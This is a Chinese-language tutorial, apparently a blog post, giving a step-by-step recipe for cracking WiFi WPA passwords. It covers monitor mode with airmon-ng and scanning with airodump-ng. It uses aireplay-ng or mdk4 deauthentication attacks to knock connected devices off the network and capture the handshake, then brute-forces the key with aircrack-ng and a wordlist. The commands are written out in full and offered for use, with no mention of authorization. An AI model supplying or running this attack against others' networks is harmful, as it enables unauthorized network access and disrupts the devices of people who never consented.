WiFi在连接时会有四次握手认证,而抓包就是抓取握手过程的密钥进行暴力破解。
给连接到WiFi的设备发送反认证攻击(deauth),在设备强制断开连接自动重连WiFi的过程中就能抓到握手包。
本文所出现注释:
|
|
注意:全程请在root用户下运行命令。
抓包过程
- 终止影响
aircrack-ng
进程
|
|
- 列出当前支持的无线网卡
airmon-ng
如果没有任何输出表示无线网卡不支持监听模式或者物理问题(
- 激活网卡监听(monitor)模式
airmon-ng start wlan0
命令执行后网卡接口会变为 wlan0mon
- 扫描WiFi网络
airodump-ng wlan0mon
执行后会把周围的无线网络排序出来,其中上半部分为附近的WiFi列表,下半部分为附近WiFi中有设备连接的信息。当找到对应的WiFi且记住MAC以及信道后Ctrl+C终止扫描。
- 抓取握手包
airodump-ng -c {Channel} --bssid {MAC} -w /tmp/wittoy wlan0mon
-w
后内容为保存路径,可自定义
这里须记住连接上该WiFi的客户端MAC。
- 强制设备下线 新建一个命令行窗口,这里有2种方式使客户端下线(推荐第一种)
Aireplay-ng攻击
aireplay-ng -0 30 -a {MAC} -c {ClientMAC} wlan0mon
MDK4攻击
mdk4 wlan0mon d -S {MAC} -c {Channal}
可加上
-s
控制速度,单位为packets/sec
注意的是此方法过于暴力,请及时Ctrl+C停止.jpg
当步骤5中的命令窗口显示 [WPA handshake: xx:xx:xx:xx:xx:xx]
代表抓包成功。
如果你的系统自带字典的话可以用 Aireplay-ng
小跑一会儿热热身,但还是建议导出包使用EWSA等专业工具跑包。
aircrack-ng -w {字典路径} {所抓的包路径}
关闭网卡监听
|
|